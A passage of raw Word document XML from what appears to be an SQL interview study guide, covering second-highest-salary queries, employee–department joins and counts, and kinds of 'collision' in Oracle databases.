      <w:r w:rsidR="0014246D"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alary of </w:t>
      </w:r>
      <w:r w:rsidR="0014246D"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mployee from the </w:t>
      </w:r>
      <w:r w:rsidR="002F0E68" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Employee </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>table?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="751"/>
    </w:p>
    <w:p w14:paraId="1F523C58" w14:textId="4E3908B7" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Here are a few </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second highest salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from an employee table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1BEE2"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D68E5">
          <v:rect id="_x0000_i3189" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F649F71"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1. Using LIMIT and OFFSET (MySQL / PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B905A6" w14:textId="77777777" w:rsidR="00F1272E" w:rsidRPr="00393B05" w:rsidRDefault="00C7673D" w:rsidP="00C7673D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>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DISTIN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LIMI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FFSE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B16B32A" w14:textId="13C53BE9" w:rsidR="00C7673D" w:rsidRPr="00393B05" w:rsidRDefault="00C7673D" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LIMIT 1 OFFSET 1 skips the highest salary and fetches the next one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6334FCEB"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ADE7CA">
          <v:rect id="_x0000_i3190" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7ADC6"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2. Using SUBQUERY with MAX()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F8596" w14:textId="77777777" w:rsidR="00C7673D" w:rsidRPr="00393B05" w:rsidRDefault="00C7673D" w:rsidP="00C7673D">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second_highest_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salary &lt;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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1952E8" w14:textId="0FA0A276" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="710"/>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Gets the maximum salary </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less than the highest</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E4B20"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21EFA">
          <v:rect id="_x0000_i3191" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4D0FC"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3. Using DENSE_RANK() (SQL Server / Oracle / PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3686BC" w14:textId="77777777" w:rsidR="005A5338" w:rsidRPr="00393B05" w:rsidRDefault="005A5338" w:rsidP="005A5338">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NSE_RANK</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V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rnk</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 ranked</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rnk = </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="1C00CF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCC042A" w14:textId="7F43A088" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DENSE_RANK() handles duplicates properly (e.g., if 2 employees have the same highest salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98605F" w14:textId="128E9C6A"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3192" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F783D1" w14:textId="10C8921F" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="008568CE" w:rsidP="00F45251">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="752" w:name="_Toc197867966"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00B40912"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9D0BA4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rint employee id, employee_name, depatment_name Employee - employee_id, employee_name, department_id</w:t>
      </w:r>
      <w:bookmarkEnd w:id="752"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B7CEDD" w14:textId="29EB130A" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="008568CE" w:rsidP="00F45251">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="753" w:name="_Toc197867967"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Department - department_id, department_name?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="753"/>
    </w:p>
    <w:p w14:paraId="0787CAAE" w14:textId="4B772B75" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="008568CE"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5071DE25" w14:textId="40E26281" w:rsidR="00E84238" w:rsidRPr="00CE4B95" w:rsidRDefault="00E84238" w:rsidP="00E84238">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi"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employee_id,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    e.employee_name,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    d.department_nam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mployee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Department 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department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961DE24" w14:textId="273B3CE5" w:rsidR="009D0BA4"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3193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7562B" w14:textId="2E256701" w:rsidR="00275317" w:rsidRPr="00CE4B95" w:rsidRDefault="00275317" w:rsidP="00275317">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="754" w:name="_Toc197867968"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQ</w:t>
      </w:r>
      <w:r w:rsidR="00581520"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 </w:t>
      </w:r>
      <w:r w:rsidR="009C1693" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00581520"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ry </w:t>
      </w:r>
      <w:r w:rsidR="009C1693" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00B94444" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ind department name and number of </w:t>
      </w:r>
      <w:r w:rsidR="00E40516"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in that department?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="754"/>
    </w:p>
    <w:p w14:paraId="77416EDC" w14:textId="5577C25E" w:rsidR="00275317" w:rsidRPr="00CE4B95" w:rsidRDefault="00275317" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE21CA1" w14:textId="77777777" w:rsidR="00E84238" w:rsidRPr="00CE4B95" w:rsidRDefault="00E84238" w:rsidP="005812BA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia"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d.department_name, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COUNT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(e.employee_id) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> employee_count</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employees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departments d </w:t>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e.department_id = d.departm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BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> d.department_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54FE4B" w14:textId="0A27C122" w:rsidR="0025066D" w:rsidRPr="00CE4B95"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3194" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236A223" w14:textId="28A1F16C" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="00652D53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="755" w:name="_Toc197867969"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a collision in the oracle database</w:t>
      </w:r>
      <w:r w:rsidR="008568CE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="755"/>
    </w:p>
    <w:p w14:paraId="4172697A" w14:textId="62FD2CE3" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Oracle databas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typically refers to a situation where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two or more operations conflict with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, often due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45331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imary Key or Unique Constraint Violation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5643A"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inserting or updating a record, if the new value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conflicts with an existing key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like a duplicate primary key), it's considered a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679005E9" w14:textId="77777777" w:rsidR="004778D0" w:rsidRPr="00CE4B95"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xample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BCD2F" w14:textId="77777777" w:rsidR="0044187E" w:rsidRPr="00CE4B95" w:rsidRDefault="0044187E"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John'</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nserting again with same employee_id will cause collision:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w: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Mike'</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ORA-00001: unique constraint violated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ABA360"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3195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA78B6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Object Name Collision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B5C5C"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ppens when trying to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>create a table, index, sequence, etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>name that already exists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the same namespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E7CB4" w14:textId="77777777" w:rsidR="000F08F7" w:rsidRPr="00CE4B95" w:rsidRDefault="000F08F7"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CRE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TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employees (...); </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f table already exists: ORA-00955: name is already used by an existing object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE90E9"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3196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="674878D5"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Replication/Import Conflict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62506F59"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uring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data replication, export/import, or data synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, collision can occur if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC9FB8"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sources try to insert/update the same record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F182F62"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s a mismatch between source and target schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE9EC4" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95"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3197" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D88B8"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lumn Name Collision in Joins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2A134" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">
      <w:p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When joining tables and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
